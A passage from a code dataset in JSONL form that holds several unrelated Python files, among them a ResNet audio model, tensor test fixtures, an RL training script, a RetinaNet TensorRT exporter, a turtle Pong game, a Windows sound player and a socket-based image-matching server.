self.conv2 = conv3x3(planes, planes)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = conv3x3(planes, planes)\n self.bn3 = nn.BatchNorm2d(planes)\n self.maxpool = nn.MaxPool2d(stride)\n self.downsample = downsample\n self.stride = stride\n self.drop_rate = drop_rate\n self.num_batches_tracked = 0\n self.drop_block = drop_block\n self.block_size = block_size\n \n\n def forward(self, x):\n self.num_batches_tracked += 1\n\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n out += residual\n out = self.relu(out)\n out = self.maxpool(out)\n out = F.dropout(out, p=self.drop_rate, training=self.training, inplace=True)\n \n \n\n return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, n_classes, n_time, block=BasicBlock, keep_prob=1.0, avg_pool=True, drop_rate=0.1, dropblock_size=5, embedding_dim=128, n_layer1 = 32, n_layer2 = 32, n_layer3 = 32, n_layer4 = 32, downpool_strides=[(2,2), (2,2), (2,2), (2,2)], channels=1):\n self.inplanes = channels\n super(ResNet, self).__init__()\n # settings\n pooling_size = (4,2)\n\n self.layer1 = self._make_layer(block, n_layer1, stride=downpool_strides[0], drop_rate=drop_rate)\n self.layer2 = self._make_layer(block, n_layer2, stride=downpool_strides[1], drop_rate=drop_rate)\n self.layer3 = self._make_layer(block, n_layer3, stride=downpool_strides[2], drop_rate=drop_rate, drop_block=True, block_size=dropblock_size)\n self.layer4 = self._make_layer(block, n_layer4, stride=downpool_strides[3], drop_rate=drop_rate, drop_block=True, block_size=dropblock_size)\n\n if avg_pool:\n self.avgpool = nn.AvgPool2d(5, stride=1)\n self.keep_prob = keep_prob\n self.keep_avg_pool = avg_pool\n self.dropout = nn.Dropout(p=1 - self.keep_prob, inplace=False)\n self.drop_rate = drop_rate\n self.pool = nn.AdaptiveAvgPool2d(pooling_size)\n\n self.fc1 = nn.Linear(np.prod(pooling_size)*n_layer4, embedding_dim)\n\n self.dropout = nn.Dropout(0.3)\n self.fc2 = nn.Linear(embedding_dim, n_classes*n_time)\n\n self.n_classes = n_classes\n self.n_time = n_time\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='leaky_relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def _make_layer(self, block, planes, stride=1, drop_rate=0.0, drop_block=False, block_size=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=1, bias=False),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, drop_rate, drop_block, block_size))\n self.inplanes = planes * block.expansion\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n \n x = self.pool(x)\n\n # flatten\n x = x.view(x.size(0), -1)\n\n x = self.fc1(x)\n x_rep = F.relu(x)\n x = self.dropout(x_rep)\n x = self.fc2(x)\n\n y_pred = x.view((-1, self.n_classes, self.n_time))\n\n return y_pred, x_rep\n","repo_name":"johnmartinsson/few-shot-learning-bioacoustics","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6689,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"11175256688","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport collections\nimport numpy as np\n\nimport tadpole.util as util\nimport tadpole.autodiff as ad\nimport tadpole.array as ar\nimport tadpole.tensor as tn\nimport tadpole.index as tid\n\nimport tadpole.tensor.engine as tne \n\nimport tests.tensor.fakes as fake\nimport tests.tensor.data as data\n\n\nfrom tadpole.tensor.types import (\n Pluggable,\n Tensor, \n Space,\n)\n\n\nfrom tadpole.index import (\n Index,\n IndexGen, \n Indices,\n)\n\n\n\n\n# --- Train data ---------------------------------------------------------- #\n\nTrainData = collections.namedtuple(\"TrainData\", [\n \"train\", \n \"tensors\", \"arrays\", \"datas\", \"inds\",\n \"indnames\", \"shapes\", \"backend\", \"opts\",\n ])\n\n\n\n\ndef train_dat(backend, indnames, shapes, **opts):\n\n ws = []\n for i in range(len(shapes)):\n\n w = data.tensor_dat(data.randn)(\n backend, indnames[i], shapes[i], seed=i+1, **opts\n )\n ws.append(w)\n\n tensors = [w.tensor for w in ws]\n arrays = [w.array for w in ws]\n datas = [w.data for w in ws]\n inds = [w.inds for w in ws]\n\n arrays = util.Sequence(arrays)\n inds = util.Sequence(inds)\n train = tne.TrainTensorData(arrays, inds)\n\n return TrainData(\n train, \n tensors, arrays, datas, inds, \n indnames, shapes, ws[0].backend, opts\n ) \n\n\n\n\n","repo_name":"dkilda/tadpole","sub_path":"tests/tensor/data/engines.py","file_name":"engines.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5545465978","text":"# ==================================================================\r\n# Clean run of sb3 rl algo on gym env\r\n# ==================================================================\r\nimport gym\r\nfrom stable_baselines3 import PPO, SAC\r\nimport torch\r\nfrom pathlib import Path\r\nfrom stable_baselines3 import PPO, SAC\r\nfrom stable_baselines3.common.vec_env import SubprocVecEnv\r\nfrom stable_baselines3.common.callbacks import CallbackList, EveryNTimesteps\r\n\r\nimport argparse\r\nimport json\r\nimport os\r\nimport sys\r\nimport numpy as np\r\n\r\nimport wandb\r\n\r\nmaster_dir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\r\nsys.path.insert(1, master_dir)\r\n\r\nfrom src.sb3_extentions.custom_cnn import CustomCnn\r\n\r\nfrom src.sb3_extentions.callbacks import SACWandbCallback\r\n\r\ndef run(args):\r\n\r\n if args.env_seed == -1:\r\n args.env_seed = None\r\n\r\n args.upsample = 1\r\n arg_dict = vars(args)\r\n\r\n if args.wandb:\r\n wandb_args = {'project': args.wandb}\r\n if args.wandb_group:\r\n wandb_args['group'] = args.wandb_group \r\n if args.wandb_name:\r\n wandb_args['name'] = args.wandb_name\r\n wandb_args['config'] = arg_dict\r\n wandb.init(**wandb_args)\r\n \r\n if args.log_dir:\r\n Path(args.log_dir).mkdir(parents=True, exist_ok=True)\r\n with open(os.path.join(args.log_dir, \"args.json\"), 'wt') as f:\r\n json.dump(arg_dict, f, indent=4)\r\n print(\"args:\\n\", arg_dict)\r\n args.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") #Add device to args so it can propogate to RP\r\n\r\n\r\n env = gym.make(args.env_name)\r\n env.seed(args.env_seed)\r\n print(env)\r\n\r\n if args.algo_name == 'PPO':\r\n policy_kwargs = dict(features_extractor_class=CustomCnn)\r\n model = RPPPO('CnnPolicy', env, policy_kwargs=policy_kwargs, verbose=1, n_steps=args.n_steps,\r\n tensorboard_log=args.log_dir)\r\n\r\n elif args.algo_name == 'SAC':\r\n model = SAC('MlpPolicy', env, verbose=2,\r\n tensorboard_log=args.log_dir)\r\n \r\n\r\n\r\n if args.wandb:\r\n # overload sb3 logger to use wandb\r\n from stable_baselines3.common import logger\r\n orig_record = logger.record\r\n def wandb_record(*args, **kwargs):\r\n if 'timesteps' in args[0]:\r\n wandb_record.step = args[1]\r\n if 'train' not in args[0]:\r\n wandb.log({args[0]: args[1]})\r\n orig_record(*args, **kwargs)\r\n\r\n wandb_record.step = 0\r\n logger.record = wandb_record\r\n\r\n callback = SACWandbCallback(args.wandb)\r\n\r\n # Learn model\r\n model.learn(total_timesteps=args.total_timesteps, callback=callback)\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--env_name', required=True, type=str)\r\n parser.add_argument('--algo_name', required=True, type=str)\r\n\r\n \r\n \r\n parser.add_argument('--run_name', required=True, type=str)\r\n parser.add_argument('--data_size', default=0, type=int)\r\n parser.add_argument('--total_timesteps', default=1000000, type=int)\r\n parser.add_argument('--env_seed', default=-1, type=int)\r\n parser.add_argument('--env_size', default=15, type=int)\r\n parser.add_argument('--n_envs', default=2, type=int)\r\n parser.add_argument('--n_steps', default=2048, type=int)\r\n parser.add_argument('--log_dir', default=None, type=str)\r\n parser.add_argument('--show_trajectory', default=False, action='store_true')\r\n parser.add_argument('--render', default=False, action='store_true')\r\n \r\n parser.add_argument('--reward_pred', default=None, type=str, help='Path to a directory containing only RP models')\r\n parser.add_argument('--rp_factor', default=1, type=float, help='multiply factor for predicted reward')\r\n parser.add_argument('--dijk_lambda', default=1, type=float, help='multiply factor for dijk reward')\r\n parser.add_argument('--far_from_goal', default=False, help='make agent as far from goal as possible', action='store_true')\r\n\r\n parser.add_argument('--n_data', default=10, type=int)\r\n # wandb\r\n parser.add_argument('--wandb', default=None, type=str, help='project name for W&B. Default: Wandb not active')\r\n parser.add_argument('--wandb_group', default=None, type=str, help='group name for W&B')\r\n parser.add_argument('--wandb_name', default=None, type=str, help='run name for W&B')\r\n\r\n parsed_args = parser.parse_args()\r\n run(parsed_args)\r\n","repo_name":"Ugadot/RL_with_trajectory_feedback","sub_path":"scripts/test_rl.py","file_name":"test_rl.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20614913121","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport json\nimport logging\nimport os\nimport struct\nimport tempfile\nimport graphsurgeon as gs\n\nimport keras.backend as K\nfrom keras.layers import Permute, Reshape\nfrom keras.models import Model\nimport tensorflow as tf\nimport uff\n\n# Import quantization layer processing.\nfrom nvidia_tao_tf1.core.export._quantized import (\n check_for_quantized_layers,\n process_quantized_layers,\n)\nfrom nvidia_tao_tf1.core.export._uff import keras_to_pb\nfrom nvidia_tao_tf1.cv.common.export.keras_exporter import KerasExporter as Exporter\nfrom nvidia_tao_tf1.cv.retinanet.initializers.prior_prob import PriorProbability\nfrom nvidia_tao_tf1.cv.retinanet.layers.anchor_box_layer import RetinaAnchorBoxes\n\nfrom nvidia_tao_tf1.cv.retinanet.utils.model_io import load_model\nfrom nvidia_tao_tf1.cv.retinanet.utils.spec_loader import load_experiment_spec\n\nNUM_FEATURE_MAPS = 5\nlogger = logging.getLogger(__name__)\n\n\nclass RetinaNetExporter(Exporter):\n \"\"\"Exporter class to export a trained RetinaNet model.\"\"\"\n\n def __init__(self, model_path=None,\n key=None,\n data_type=\"fp32\",\n strict_type=False,\n experiment_spec_path=\"\",\n backend=\"uff\",\n **kwargs):\n \"\"\"Instantiate the RetinaNet exporter to export etlt model.\n\n Args:\n model_path(str): Path to the RetinaNet model file.\n key (str): Key to decode the model.\n data_type (str): Backend data-type for the optimized TensorRT engine.\n strict_type(bool): Apply TensorRT strict_type_constraints or not for INT8 mode.\n experiment_spec_path (str): Path to RetinaNet experiment spec file.\n backend (str): Type of intermediate backend parser to be instantiated.\n \"\"\"\n super(RetinaNetExporter, self).__init__(model_path=model_path,\n key=key,\n data_type=data_type,\n strict_type=strict_type,\n backend=backend)\n self.experiment_spec_path = experiment_spec_path\n assert os.path.isfile(self.experiment_spec_path), \\\n \"Experiment spec file not found at {}.\".format(self.experiment_spec_path)\n self.experiment_spec = load_experiment_spec(self.experiment_spec_path)\n self.custom_objects = {'RetinaAnchorBoxes': RetinaAnchorBoxes,\n 'PriorProbability': PriorProbability}\n self.tlt2 = False\n self.num_classes = len({str(x) for x in\n self.experiment_spec.dataset_config.target_class_mapping.values()})\n\n def load_model(self, backend=\"uff\"):\n \"\"\"Simple function to load the RetinaNet Keras model.\"\"\"\n experiment_spec = self.experiment_spec\n K.clear_session()\n K.set_learning_phase(0)\n model = load_model(self.model_path, experiment_spec, key=self.key)\n if model.get_layer('mbox_conf').output.shape[3] == self.num_classes:\n self.tlt2 = True\n outputs = self.generate_trt_output(model.get_layer('mbox_loc').output,\n model.get_layer('mbox_conf').output,\n model.get_layer('mbox_priorbox').output)\n model = Model(inputs=model.inputs, outputs=outputs)\n\n if check_for_quantized_layers(model):\n model, self.tensor_scale_dict = process_quantized_layers(\n model, backend,\n calib_cache=None,\n calib_json=None)\n\n # plugin nodes will have different names in TRT\n nodes = list(self.tensor_scale_dict.keys())\n for k in nodes:\n if k.find('upsample') != -1:\n node_name_in_trt = k.split('/')[0]\n self.tensor_scale_dict[node_name_in_trt] = self.tensor_scale_dict.pop(k)\n\n # ZeroPadding is fused with its following conv2d/depthwiseconv2d, collapse them.\n padding_nodes = []\n for k in self.tensor_scale_dict:\n if '/Pad' in k:\n # this is a ZeroPadding node\n padding_nodes.append(k)\n for n in padding_nodes:\n self.tensor_scale_dict.pop(n)\n\n img_mean = experiment_spec.augmentation_config.image_mean\n self.image_mean = [103.939, 116.779, 123.68] \\\n if experiment_spec.augmentation_config.output_channel == 3 else [117.3786]\n if img_mean:\n if experiment_spec.augmentation_config.output_channel == 3:\n self.image_mean = [img_mean['b'], img_mean['g'], img_mean['r']]\n else:\n self.image_mean = [img_mean['l']]\n return model\n\n def _calibration_cache_from_dict(self, tensor_scale_dict,\n calibration_cache=None,\n calib_json=None):\n \"\"\"Write calibration cache file for QAT model.\n\n This function converts a tensor scale dictionary generated by processing\n QAT models to TRT readable format. By default we set it as a\n trt.IInt8.EntropyCalibrator2 cache file.\n\n Args:\n tensor_scale_dict (dict): The dictionary of parameters: scale_value file.\n calibration_cache (str): Path to output calibration cache file.\n\n Returns:\n No explicit returns.\n \"\"\"\n if calibration_cache is not None:\n cal_cache_str = \"TRT-{}-EntropyCalibration2\\n\".format(self._trt_version_number)\n assert not os.path.exists(calibration_cache), (\n \"A pre-existing cache file exists. Please delete this \"\n \"file and re-run export.\"\n )\n # Converting float numbers to hex representation.\n for tensor in tensor_scale_dict:\n if tensor in [\"P4_upsampled\", \"P5_upsampled\"]:\n continue\n scaling_factor = tensor_scale_dict[tensor] / 127.0\n cal_scale = hex(struct.unpack(\"i\", struct.pack(\"f\", scaling_factor))[0])\n assert cal_scale.startswith(\n \"0x\"), \"Hex number expected to start with 0x.\"\n cal_scale = cal_scale[2:]\n cal_cache_str += tensor + \": \" + cal_scale + \"\\n\"\n with open(calibration_cache, \"w\") as f:\n f.write(cal_cache_str)\n\n if calib_json is not None:\n calib_json_data = {\"tensor_scales\": {}}\n for tensor in tensor_scale_dict:\n calib_json_data[\"tensor_scales\"][tensor] = float(\n tensor_scale_dict[tensor])\n with open(calib_json, \"w\") as outfile:\n json.dump(calib_json_data, outfile, indent=4)\n\n def generate_trt_output(self, loc, conf, anchor):\n \"\"\"Manipulate model outputs so we can use TRT NMS plugin.\"\"\"\n\n out_loc = Reshape((-1, 1, 1), name='loc_data')(loc)\n out_conf = Reshape((-1, 1, 1), name='conf_data')(conf)\n out_anchor = Reshape((-1, 2, 4), name=\"anchor_reshape\")(anchor)\n out_anchor = Permute((2, 1, 3), name=\"anchor_permute\")(out_anchor)\n out_anchor = Reshape((2, -1, 1), name='anchor_data')(out_anchor)\n return [out_loc, out_conf, out_anchor]\n\n def save_exported_file(self, model, output_file_name):\n \"\"\"Save the exported model file.\n\n This routine converts a keras model to onnx/uff model\n based on the backend the exporter was initialized with.\n\n Args:\n model (keras.model.Model): Decoded keras model to be exported.\n output_file_name (str): Path to the output file.\n\n Returns:\n tmp_uff_file (str): Path to the temporary uff file.\n \"\"\"\n os_handle, tmp_pb_file = tempfile.mkstemp(suffix=\".pb\")\n os.close(os_handle)\n\n if self.backend == \"uff\":\n keras_to_pb(model, tmp_pb_file, None,\n custom_objects=self.custom_objects)\n tf.reset_default_graph()\n dynamic_graph = gs.DynamicGraph(tmp_pb_file)\n dynamic_graph = self.node_process(dynamic_graph)\n\n os.remove(tmp_pb_file)\n\n uff.from_tensorflow(dynamic_graph.as_graph_def(),\n self.output_node_names,\n output_filename=output_file_name,\n text=False,\n quiet=True)\n logger.info(\"Converted model was saved into %s\", output_file_name)\n return output_file_name\n raise NotImplementedError(\"Invalid backend provided. {}\".format(self.backend))\n\n def set_input_output_node_names(self):\n \"\"\"Set input output node names.\"\"\"\n self.output_node_names = [\"NMS\"]\n self.input_node_names = [\"Input\"]\n\n def node_process(self, retinanet_graph):\n \"\"\"Manipulating the dynamic graph to make it compatible with TRT.\n\n Args:\n retinanet_graph (gs.DynamicGraph): Dynamic graph from the TF Proto file.\n\n Returns:\n retinanet_graph (gs.DymanicGraph): Post processed dynamic graph which is ready to be\n serialized as a uff file.\n \"\"\"\n spec = self.experiment_spec\n FirstDimTile = [\n gs.create_node(name=\"FirstDimTile_{}\".format(i), trt_plugin=True,\n op=\"BatchTilePlugin_TRT\")\n for i in range(NUM_FEATURE_MAPS)\n ]\n\n # TensorRT Bug 2603572, anchor_data/Reshape must be at the very beginning!\n if self.tlt2:\n background_id = -1\n num_classes = self.num_classes\n else:\n background_id = 0\n num_classes = self.num_classes + 1\n\n NMS = gs.create_plugin_node(name='NMS', op='NMS_TRT',\n inputs=['anchor_data/Reshape',\n 'loc_data/Reshape',\n 'conf_data/Reshape'],\n shareLocation=1,\n varianceEncodedInTarget=0,\n backgroundLabelId=background_id,\n confidenceThreshold=spec.nms_config.confidence_threshold,\n nmsThreshold=spec.nms_config.clustering_iou_threshold,\n topK=2*spec.nms_config.top_k, # topK as NMS input\n codeType=1,\n keepTopK=spec.nms_config.top_k, # NMS output topK\n numClasses=num_classes,\n inputOrder=[1, 2, 0],\n confSigmoid=1,\n isNormalized=1,\n scoreBits=spec.nms_config.infer_nms_score_bits)\n\n # Create a mapping of namespace names -> plugin nodes.\n namespace_plugin_map = {\"retinanet_anchor_{}/FirstDimTile\".format(i): FirstDimTile[i]\n for i in range(NUM_FEATURE_MAPS)}\n resizenearest_map = {'P4_upsampled': gs.create_plugin_node(name='P4_upsampled',\n op=\"ResizeNearest_TRT\",\n scale=2.0),\n 'P5_upsampled': gs.create_plugin_node(name='P5_upsampled',\n op=\"ResizeNearest_TRT\",\n scale=2.0)}\n namespace_plugin_map.update(dict(resizenearest_map))\n # Create a new graph by collapsing namespaces\n retinanet_graph.append(NMS)\n retinanet_graph.collapse_namespaces(namespace_plugin_map)\n return retinanet_graph\n\n def get_class_labels(self):\n \"\"\"Get list of class labels to serialize to a labels.txt file.\"\"\"\n classes = sorted({str(x) for x in\n self.experiment_spec.dataset_config.target_class_mapping.values()})\n # add background label at idx=0:\n classes = [\"background\"] + classes\n return classes\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/retinanet/export/exporter.py","file_name":"exporter.py","file_ext":"py","file_size_in_byte":12399,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"42488075194","text":"import turtle\n\npencere = turtle.Screen()\ncanvas = pencere.getcanvas()\nroot = canvas.winfo_toplevel()\npencere.title('PyPong Game')\npencere.bgcolor('black')\npencere.setup(width=800, height=600)\npencere.tracer(0)\n\nracket_a = turtle.Turtle()\nracket_a.speed(0)\nracket_a.shape('square')\nracket_a.color('white')\nracket_a.penup()\nracket_a.goto(-350, 0)\nracket_a.shapesize(5, 1)\n\nracket_b = turtle.Turtle()\nracket_b.speed(0)\nracket_b.shape('square')\nracket_b.color('white')\nracket_b.penup()\nracket_b.goto(350, 0)\nracket_b.shapesize(5, 1)\n\nball = turtle.Turtle()\nball.speed(0)\nball.shape('circle')\nball.color('white')\nball.penup()\nball.dx = 0.15\nball.dy = 0.15\n\nskor = turtle.Turtle()\nskor.speed(0)\nskor.color('white')\nskor.penup()\nskor.goto(0, 260)\nskor.write('Oyuncu A:0 Oyuncu B:0', align='center', font=('courier', 24, 'bold'))\nskor.hideturtle()\nskor_a = 0\nskor_b = 0\n\n\ndef racket_a_up():\n y = racket_a.ycor()\n y = y + 20\n racket_a.sety(y)\ndef racket_a_down():\n y = racket_a.ycor()\n y = y - 20\n racket_a.sety(y)\ndef racket_b_up():\n y = racket_b.ycor()\n y = y + 20\n racket_b.sety(y)\ndef racket_b_down():\n y = racket_b.ycor()\n y = y - 20\n racket_b.sety(y)\n\npencere.listen()\npencere.onkeypress(racket_a_up, \"w\")\npencere.onkeypress(racket_a_down, \"s\")\npencere.onkeypress(racket_b_up, \"Up\")\npencere.onkeypress(racket_b_down, \"Down\")\n\ndef winclose():\n global winbug\n winbug = False\nroot.protocol(\"WM_DELETE_WINDOW\", winclose)\nwinbug = True\n\nwhile winbug:\n pencere.update()\n ball.setx(ball.xcor() + ball.dx)\n ball.sety(ball.ycor() + ball.dy)\n\n if ball.ycor()>290 or ball.ycor()<-290:\n ball.dy = ball.dy * -1\n\n if ball.xcor()>390:\n ball.goto(0, 0)\n ball.dx = ball.dx * -1\n skor_a = skor_a + 1\n skor.clear()\n skor.write(\"Oyuncu A:{} Oyuncu B:{}\".format(skor_a, skor_b), align='center', font=('courier', 24, 'bold'))\n if ball.xcor()<-390:\n ball.goto(0, 0)\n ball.dx = ball.dx * -1\n skor_b = skor_b + 1\n skor.clear()\n skor.write(\"Oyuncu A:{} Oyuncu B:{}\".format(skor_a, skor_b), align='center', font=('courier', 24, 'bold'))\n if(ball.xcor()>340 and ball.xcor()<350) and (ball.ycor()racket_b.ycor()-60):\n ball.setx(340)\n ball.dx = ball.dx * -1\n if(ball.xcor()<-340 and ball.xcor()>-350) and (ball.ycor()racket_a.ycor()-60):\n ball.setx(-340)\n ball.dx = ball.dx * -1\n","repo_name":"HzTewso/PyPong","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20078669733","text":"import stdio\nimport sys\n\n# Get n(int) from command line.\nn = int(sys.argv[1])\n\nfor i in range(2, n + 1):\n # For each i from [2, n]...\n\n # Set total(sum of divisors of i) to 0\n total = 0\n\n for j in range(1, (i // 2) + 1):\n # For each j from [1, i/2],...\n if i % j == 0:\n # if i is divisible by j, increment total by j.\n total += j\n if total == i:\n # If total equals i, write i(the perfect number).\n stdio.writeln(i)\n","repo_name":"mouratony/CS110-Python","sub_path":"Programs with Control Flow/perfect_numbers.py","file_name":"perfect_numbers.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10726559202","text":"# coding: utf-8\n# Copied from a coding forum and was modified\n# Thank the origin author, although I cannot find the earliest person\n\n\nclass PlaysoundException(Exception):\n pass\n\n\ndef playsound(sound, block=True):\n \"\"\"\n Utilizes windll.winmm. Tested and known to work with MP3 and WAVE on\n Windows 7 with Python 2.7. Probably works with more file formats.\n Probably works on Windows XP thru Windows 10. Probably works with all\n versions of Python.\n\n Inspired by (but not copied from) Michael Gundlach 's mp3play:\n https://github.com/michaelgundlach/mp3play\n\n I never would have tried using windll.winmm without seeing his code.\n \"\"\"\n from ctypes import c_buffer, windll\n from random import random\n from time import sleep\n from sys import getfilesystemencoding\n\n def winCommand(*command):\n buf = c_buffer(255)\n command = ' '.join(command).encode(getfilesystemencoding())\n errorCode = int(windll.winmm.mciSendStringA(command, buf, 254, 0))\n if errorCode:\n errorBuffer = c_buffer(255)\n windll.winmm.mciGetErrorStringA(errorCode, errorBuffer, 254)\n try:\n exceptionMessage = ('\\n Error ' + str(errorCode) + ' for command:'\n '\\n ' + command.decode() +\n '\\n ' + errorBuffer.value.decode())\n except:\n exceptionMessage = ('\\n Error ' + str(errorCode) + ' for command:'\n '\\n ' + command.decode(\"gbk\") +\n '\\n ' + errorBuffer.value.decode(\"gbk\"))\n raise PlaysoundException(exceptionMessage)\n return buf.value\n\n alias = 'playsound_' + str(random())\n winCommand('open \"' + sound + '\" alias', alias)\n winCommand('set', alias, 'time format milliseconds')\n durationInMS = winCommand('status', alias, 'length')\n winCommand('play', alias, 'from 0 to', durationInMS.decode())\n\n if block:\n sleep(float(durationInMS) / 1000.0)\n winCommand('close', alias)\n\n\nif __name__ == '__main__':\n import sys\n\n playsound(sys.argv[1])\n","repo_name":"rainydew/verachess","sub_path":"src/music-player/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"33595424770","text":"\nimport socket, time, sys, struct, os\nimport cv2, pickle, threading\nimport numpy as np\nfrom flask import request, url_for\nfrom flask_api import FlaskAPI, status, exceptions\nfrom os import listdir\nfrom os.path import isfile, join\nfrom queue import Queue\n\nHOST = '0.0.0.0'\nUSER_PORT = 9001\nREST_PORT = USER_PORT + 1000\n\nSIZE = 100 # number of comparing images\nSOCKET_TIME_OUT = 10\nINFOS = [1] # ms rtt\nFOLDER = 'images/'\nCWD = os.getcwd()\nTRAFFIC = 1.0\n\nUSERS = {} # store the user id, socket, queue\n\nserver = FlaskAPI(__name__)\n\n@server.route(\"/\", methods=['GET', 'POST', 'PUT'])\ndef function():\n global INFOS, TRAFFIC\n if request.method in ['POST', 'PUT']:\n traffic = str(request.data.get('traffic', ''))\n try:\n TRAFFIC = float(traffic)\n print(\"traffic: \", TRAFFIC)\n except: \n pass\n\n perf = str(request.data.get('perf', ''))\n try:\n INFOS.append(float(perf))\n print(\"perf: \", float(perf))\n except: \n pass\n \n return str(TRAFFIC), status.HTTP_202_ACCEPTED # return traffic, directly to UE \n else:\n useful_len = int(len(INFOS)*0.8) # last 50%\n avg_data = int(100*np.mean(INFOS[useful_len:]))/100 # get average \n INFOS = [INFOS[-1]] # reset the data\n # reset queue of all users\n for key, user in USERS.items():\n id, _, the_queue = user\n with the_queue.mutex: the_queue.queue.clear() # clear all\n print(\"clear queue for user: \", id, the_queue.qsize())\n\n return str(avg_data), status.HTTP_200_OK\n\n\ndef recv_image_from_socket(client, buffers):\n start_time = time.time() # time when recv starts\n # print(\"start buffers len: \", len(buffers))\n \n while len(buffers) < 8:\n try:\n buf = client.recv(1024)\n except:\n return False, 0, b''\n buffers += buf\n # if recv too long, then consider this user is disconnected\n if time.time() - start_time >= SOCKET_TIME_OUT:\n return False, 0, b''\n \n img_size_byte_pkt = buffers[:4] # here buffer could larger than 4 len\n img_id_byte_pkt = buffers[4:8] # here buffer could larger than 4 len\n buffers = buffers[8:] # here buffer could larger than 4 len\n\n size, = struct.unpack('!i', img_size_byte_pkt)\n id, = struct.unpack('!i', img_id_byte_pkt)\n # print(\"packet to be recvd: \", size)\n # print(\"middle remains len: \", len(buffers))\n\n while len(buffers) < size:\n try:\n buf = client.recv(1024)\n except:\n return False, 0, b''\n buffers += buf\n # if recv too long, then consider this user is disconnected\n if time.time() - start_time >= SOCKET_TIME_OUT:\n return False, 0, b''\n\n image_data = buffers[:size]\n buffers = buffers[size:]\n\n # print(\"late remains len: \", len(buffers))\n imgdata = np.frombuffer(image_data, dtype='uint8')\n frame = cv2.imdecode(imgdata, 1)\n\n return frame, id, buffers\n\n\ndef process(feature_extractor, matcher, image, database):\n\n latent = feature_extractor.inference(image) \n obj_id = sub_process_matching(latent, database, matcher)\n\n return obj_id\n\n\nclass ORB:\n def __init__(self,):\n # Initiate ORB detector\n self.orb = cv2.ORB_create()\n # the default edgethreshold is 31, cannot detect keypoints\n # which is not suitable for small cropped image\n # reduce this value can apply to small image\n\n def inference(self, img):\n # find the keypoints with ORB\n kp = self.orb.detect(img, None)\n # compute the descriptors with ORB\n kp, des = self.orb.compute(img, kp)\n \n if des is None:\n # if no feature detected, then randomly generated 100 features.\n des = np.random.randint(0, 100, (100, 32), dtype=np.uint8)\n\n des = des[:100] # max number of features\n\n return des\n\n\ndef sub_process_matching(features, database, matcher):\n # given an object (loc, latent), find the corresponding object in global_database\n # the geo-distance should be smaller than NEARBY_DIST, and then find the minimum latent one\n # if not found, then report a new object detected.\n obj_id, min_aug_dist = 0, 1e9\n\n for key, latent in database.items():\n # where latent vector could be just a vector or a multi-vector due to orb detection \n matches = matcher.match(latent, features) # store the latent dist\n avg_distance = np.mean([match.distance for match in matches])\n \n if avg_distance <= min_aug_dist: # if geo loc is nearby and aug-distance is smaller\n min_aug_dist = avg_distance\n obj_id = key\n\n return obj_id\n\n\ndef start_rest_api():\n server.run(host=HOST,port=REST_PORT)\n print('completed!')\n\n\ndef service_thread(user,):\n id, client, img_queue = user\n\n feature_extractor = ORB()\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n\n while True:\n try: # try to get image from image queue\n\n recv_time, frame_id, frame = img_queue.get() # by default block=True\n\n start_time = time.time()\n\n match_id = process(feature_extractor, matcher, frame, database) # process the img\n\n result_str = str(match_id) + '\\n' # prepare data\n\n client.sendall(result_str.encode()) # send back to client\n\n encode_recv_id = (str(frame_id)+'\\n').encode() # the size of first packet\n\n client.sendall(encode_recv_id) # send packet id recv before\n\n send_time = int(1000*(time.time() - start_time))/1000\n if send_time > 1: print(\"process time (s): \", send_time, flush=True)\n\n except: # otherwise pass\n pass\n\n\ndef user_thread(user,):\n global USERS\n id, client, img_queue = user\n \n X = threading.Thread(target = service_thread, args=(user,))\n X.setDaemon(True)\n X.start()\n\n buffers = b''\n # if client connected, keeping processing its data\n while True:\n frame, frame_id, buffers = recv_image_from_socket(client, buffers) # receive from client\n \n if frame is False:\n USERS.pop(id, None) # remove the user\n print(\"droped client id: \", id)\n break\n \n recv_time = time.time()\n if img_queue.full(): img_queue.get() # if the queue is full, pop out the first one\n img_queue.put((recv_time, frame_id, frame)) # put into image queue and recv time stamp\n # print('recv id', frame_id, flush=True)\n\n 